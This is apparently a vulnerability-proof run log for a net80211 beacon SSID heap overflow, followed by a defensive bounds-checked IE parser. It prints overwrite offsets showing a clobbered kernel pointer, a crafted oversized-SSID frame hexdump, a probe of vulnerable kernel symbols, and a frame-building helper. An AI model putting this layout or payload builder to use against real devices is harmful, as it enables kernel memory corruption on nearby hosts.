DF-0326 / run.log
===== node_overflow (code-level proof) =====
DF-0326: ieee80211_node SSID heap overflow -- code-level proof
struct node_tail size = 136 bytes (LP64)
Offsets (from start of node_tail):
  ni_esslen            off=28  size=1
  ni_essid[32]         off=29  size=32
  ni_rates             off=61  size=16
  ni_chan (POINTER)    off=80  size=8   (kernel POINTER)
  ni_fhdwell           off=88  size=2
  ni_fhindex           off=90  size=1
  ni_erp               off=92  size=2
  ni_timoff            off=94  size=2
  ni_dtim_period       off=96  size=1
  ni_dtim_count        off=97  size=1
  ni_meshidlen         off=98  size=1
  ni_meshid[32]        off=99  size=32
ni_essid -> ni_chan distance = 51 bytes => an SSID of length >= 59 (51 + 8) fully overwrites ni_chan.

=== overflow with ssid_len = 32 (ni_esslen now 32) ===
ni_essid sink is 32 bytes wide; memcpy wrote 32 bytes -> 0 byte OVERFLOW
  ni_esslen            off=28  size=1   intact
  ni_essid[32]         off=29  size=32  [SINK] fits
  ni_rates             off=61  size=16  intact
  ni_chan (POINTER)    off=80  size=8   intact   ptr=0xdeadbeef12345678
  ni_fhdwell           off=88  size=2   intact
  ni_fhindex           off=90  size=1   intact
  ni_erp               off=92  size=2   intact
  ni_timoff            off=94  size=2   intact
  ni_dtim_period       off=96  size=1   intact
  ni_dtim_count        off=97  size=1   intact
  ni_meshidlen         off=98  size=1   intact
  ni_meshid[32]        off=99  size=32  intact

=== overflow with ssid_len = 48 (ni_esslen now 48) ===
ni_essid sink is 32 bytes wide; memcpy wrote 48 bytes -> 16 byte OVERFLOW
  ni_esslen            off=28  size=1   intact
  ni_essid[32]         off=29  size=32  [SINK] overflows past end
  ni_rates             off=61  size=16  CLOBBERED
  ni_chan (POINTER)    off=80  size=8   intact   ptr=0xdeadbeef12345678
  ni_fhdwell           off=88  size=2   intact
  ni_fhindex           off=90  size=1   intact
  ni_erp               off=92  size=2   intact
  ni_timoff            off=94  size=2   intact
  ni_dtim_period       off=96  size=1   intact
  ni_dtim_count        off=97  size=1   intact
  ni_meshidlen         off=98  size=1   intact
  ni_meshid[32]        off=99  size=32  intact
ni_chan at offset 80 is BEYOND the last byte written (29 + 48 = 77) -> not reached

=== overflow with ssid_len = 56 (ni_esslen now 56) ===
ni_essid sink is 32 bytes wide; memcpy wrote 56 bytes -> 24 byte OVERFLOW
  ni_esslen            off=28  size=1   intact
  ni_essid[32]         off=29  size=32  [SINK] overflows past end
  ni_rates             off=61  size=16  CLOBBERED
  ni_chan (POINTER)    off=80  size=8   CLOBBERED   ptr=0xdeadbecccccccccc  <-- ATTACKER-CONTROLLED KERNEL POINTER
  ni_fhdwell           off=88  size=2   intact
  ni_fhindex           off=90  size=1   intact
  ni_erp               off=92  size=2   intact
  ni_timoff            off=94  size=2   intact
  ni_dtim_period       off=96  size=1   intact
  ni_dtim_count        off=97  size=1   intact
  ni_meshidlen         off=98  size=1   intact
  ni_meshid[32]        off=99  size=32  intact
ni_chan bytes after overflow (offset 80, little-endian): cc cc cc cc cc be ad de  <- 5/8 bytes of the channel pointer are attacker-controlled (write ends at offset 29 + 56 = 85)

=== overflow with ssid_len = 192 (ni_esslen now 192) ===
ni_essid sink is 32 bytes wide; memcpy wrote 192 bytes -> 160 byte OVERFLOW
  ni_esslen            off=28  size=1   intact
  ni_essid[32]         off=29  size=32  [SINK] overflows past end
  ni_rates             off=61  size=16  CLOBBERED
  ni_chan (POINTER)    off=80  size=8   CLOBBERED   ptr=0xcccccccccccccccc  <-- ATTACKER-CONTROLLED KERNEL POINTER
  ni_fhdwell           off=88  size=2   CLOBBERED
  ni_fhindex           off=90  size=1   CLOBBERED
  ni_erp               off=92  size=2   CLOBBERED
  ni_timoff            off=94  size=2   CLOBBERED
  ni_dtim_period       off=96  size=1   CLOBBERED
  ni_dtim_count        off=97  size=1   CLOBBERED
  ni_meshidlen         off=98  size=1   CLOBBERED
  ni_meshid[32]        off=99  size=32  CLOBBERED
ni_chan bytes after overflow (offset 80): cc cc cc cc cc cc cc cc  <- 8/8 bytes of the channel pointer are attacker-controlled

=== overflow with ssid_len = 255 (ni_esslen now 255) ===
ni_essid sink is 32 bytes wide; memcpy wrote 255 bytes -> 223 byte OVERFLOW
  ni_esslen            off=28  size=1   intact
  ni_essid[32]         off=29  size=32  [SINK] overflows past end
  ni_rates             off=61  size=16  CLOBBERED
  ni_chan (POINTER)    off=80  size=8   CLOBBERED   ptr=0xcccccccccccccccc  <-- ATTACKER-CONTROLLED KERNEL POINTER
  ni_fhdwell           off=88  size=2   CLOBBERED
  ni_fhindex           off=90  size=1   CLOBBERED
  ni_erp               off=92  size=2   CLOBBERED
  ni_timoff            off=94  size=2   CLOBBERED
  ni_dtim_period       off=96  size=1   CLOBBERED
  ni_dtim_count        off=97  size=1   CLOBBERED
  ni_meshidlen         off=98  size=1   CLOBBERED
  ni_meshid[32]        off=99  size=32  CLOBBERED
ni_chan bytes after overflow (offset 80): cc cc cc cc cc cc cc cc  <- 8/8 bytes of the channel pointer are attacker-controlled
(255 - 32 = 223 overflow bytes run past the 136-byte node_tail: writes from offset 136 onward land in whatever follows the node allocation)

VERDICT: ni_essid[32] is overflowed by any Beacon whose SSID IE length byte exceeds 32.
         ni_rates (offset 32 from ni_essid) and the ni_chan kernel POINTER (offset 51 from ni_essid) are both attacker-writable.

===== beacon_gen 192 > beacon.bin =====
DF-0326 beacon emitted: ssid_len=192 (>32 triggers the ni_essid[32] overflow; ni_rates + ni_chan pointer are clobbered).
Total 192 SSID bytes attacker-controlled.
first 96 bytes of the crafted beacon (hexdump -C):
00000000  08 00 00 00 ff ff ff ff  ff ff 00 11 22 33 44 55  |............"3DU|
00000010  00 11 22 33 44 55 00 00  00 00 00 00 00 00 00 00  |.."3DU..........|
00000020  64 00 01 04 00 c0 41 42  43 44 45 46 47 48 49 4a  |d.....ABCDEFGHIJ|
00000030  4b 4c 4d 4e 4f 50 51 52  53 54 55 56 57 58 59 5a  |KLMNOPQRSTUVWXYZ|
00000040  41 42 43 44 45 46 47 48  49 4a 4b 4c 4d 4e 4f 50  |ABCDEFGHIJKLMNOP|
00000050  51 52 53 54 55 56 57 58  59 5a 41 42 43 44 45 46  |QRSTUVWXYZABCDEF|
beacon.bin size:
-rw-r--r--  1 maxx  maxx  239 Jul  1 16:09 beacon.bin
--- decode: frame control = 08 00 at offset 0x00 (first byte 0x08 decodes as type=2 data / subtype=0; an 802.11 beacon carries 0x80 0x00, so a conforming parser would not classify this frame as a beacon); MAC header 0x00..0x17; fixed params (timestamp, interval 0x0064, capability 0x0401) at body offset 0x00..0x0b; SSID IE tag+len = 00 c0 (len 192) at frame offset 0x24..0x25 (body offset 0x0c..0x0d); SSID bytes start at frame offset 0x26 (38) ---

===== live-kernel reachability probe =====
--- vulnerable symbols in /boot/kernel/kernel (T = live text) ---
ffffffff8078c4c0 T ieee80211_add_scan
ffffffff8077dc50 T ieee80211_init_neighbor
ffffffff8077d1f0 T ieee80211_sta_join
ffffffff8077c570 t ieee80211_sta_join1
--- SSID_INVALID status flag consumers (should be NONE) ---
grep -c BPARSE_SSID_INVALID across the wlan tree: live kernel is closed-source; see env.txt host-side analysis
--- 802.11 interfaces present (radio check) ---
vtnet0
lo0
(no wlan interface present: reachability over the air could not be exercised on this host)
RUN_OK
RUN_EXIT=0
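Added example, not part of the DF-0326 run output and not net80211's own parser: a bounds-checked beacon IE walker that performs the missing check the VERDICT above calls for (reject any SSID IE whose length byte exceeds the 32-byte ni_essid sink) before anything is copied, and that also classifies the frame-control byte, which is how the 0x08 in the crafted beacon shows up. The frame builder reproduces the hexdump layout above (broadcast addr1, BSSID 00:11:22:33:44:55, interval 0x0064, capability 0x0401, SSID pattern A..Z repeating); the names extract_ssid, build_beacon and the return codes are this example's own, and IEEE80211_NWID_LEN = 32 is assumed to match the ni_essid[32] width in the layout.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define IEEE80211_NWID_LEN 32   /* assumed: width of the ni_essid sink in the layout above */
#define MGMT_HDR_LEN       24   /* fc(2) dur(2) addr1/2/3(18) seq(2) */
#define BEACON_FIXED_LEN   12   /* timestamp(8) beacon interval(2) capability(2) */
#define IE_SSID            0
#define FC_TYPE(b0)    (((b0) >> 2) & 0x3)   /* 0 = mgmt, 1 = ctrl, 2 = data */
#define FC_SUBTYPE(b0) (((b0) >> 4) & 0xf)   /* 8 = beacon for type mgmt */

enum ssid_rc { SSID_OK = 0, SSID_NOT_BEACON = -1, SSID_TRUNCATED = -2,
               SSID_BAD_IE = -3, SSID_MISSING = -4, SSID_TOO_LONG = -5 };

/* Parse frame as a beacon and copy the SSID into out[32] only if its length
 * byte is <= 32.  Each IE header and body is checked against the frame length
 * before it is read, so a lying length byte cannot run the walker off the end. */
int extract_ssid(const uint8_t *frame, size_t len,
                 uint8_t out[IEEE80211_NWID_LEN], uint8_t *outlen)
{
    if (len < MGMT_HDR_LEN + BEACON_FIXED_LEN) return SSID_TRUNCATED;
    if (FC_TYPE(frame[0]) != 0 || FC_SUBTYPE(frame[0]) != 8) return SSID_NOT_BEACON;
    size_t off = MGMT_HDR_LEN + BEACON_FIXED_LEN;      /* first IE, frame offset 0x24 */
    while (off + 2 <= len) {
        uint8_t tag = frame[off], ielen = frame[off + 1];
        if (off + 2 + ielen > len) return SSID_BAD_IE;  /* IE claims more than the frame has */
        if (tag == IE_SSID) {
            if (ielen > IEEE80211_NWID_LEN) return SSID_TOO_LONG;  /* the DF-0326 trigger */
            memcpy(out, frame + off + 2, ielen);        /* now provably fits the sink */
            *outlen = ielen;
            return SSID_OK;
        }
        off += 2 + ielen;
    }
    return SSID_MISSING;
}

/* Build a frame with the same header/fixed fields as the hexdump above
 * (constructed here).  fc0 is the first frame-control byte, ssid_len the SSID
 * IE length byte; the body is the A..Z pattern.  Returns bytes written, 0 if
 * buf is too small. */
size_t build_beacon(uint8_t *buf, size_t cap, uint8_t fc0, uint8_t ssid_len)
{
    static const uint8_t after_fc0[] = {
        0x00,                                    /* frame control byte 1 */
        0x00, 0x00,                              /* duration */
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff,      /* addr1: broadcast */
        0x00, 0x11, 0x22, 0x33, 0x44, 0x55,      /* addr2: source */
        0x00, 0x11, 0x22, 0x33, 0x44, 0x55,      /* addr3: BSSID */
        0x00, 0x00,                              /* sequence control */
        0, 0, 0, 0, 0, 0, 0, 0,                  /* timestamp */
        0x64, 0x00,                              /* beacon interval 100 TU */
        0x01, 0x04,                              /* capability info */
    };
    size_t need = 1 + sizeof after_fc0 + 2 + ssid_len;   /* 36 + 2 + ssid_len */
    if (cap < need) return 0;
    buf[0] = fc0;
    memcpy(buf + 1, after_fc0, sizeof after_fc0);
    buf[36] = IE_SSID;
    buf[37] = ssid_len;
    for (size_t i = 0; i < ssid_len; i++) buf[38 + i] = (uint8_t)('A' + i % 26);
    return need;
}

int main(void)
{
    uint8_t frame[512], ssid[IEEE80211_NWID_LEN], n = 0;
    size_t len;

    /* The frame as emitted above: fc byte 0x08 and a 192-byte SSID. */
    len = build_beacon(frame, sizeof frame, 0x08, 192);
    printf("as emitted (fc0=0x08, ssid_len=192): rc=%d\n", extract_ssid(frame, len, ssid, &n));

    /* Same payload with a real beacon frame control: the length check fires. */
    len = build_beacon(frame, sizeof frame, 0x80, 192);
    printf("beacon fc (0x80), ssid_len=192:        rc=%d\n", extract_ssid(frame, len, ssid, &n));

    /* Frame cut short of what the IE length byte promises. */
    printf("beacon truncated to 100 bytes:         rc=%d\n", extract_ssid(frame, 100, ssid, &n));

    /* A conforming 32-byte SSID is accepted and copied. */
    len = build_beacon(frame, sizeof frame, 0x80, 32);
    printf("beacon fc, ssid_len=32:                rc=%d outlen=%u first=%c\n",
           extract_ssid(frame, len, ssid, &n), n, ssid[0]);
    return 0;
}
```

The walker returns SSID_TOO_LONG for exactly the beacons the node_overflow table flags (length byte > 32) and SSID_BAD_IE when the length byte overruns the frame, so neither case reaches the memcpy; the FC check is what makes the 0x08 in the hexdump matter, since a beacon handler keyed on type/subtype never sees a frame that decodes as data.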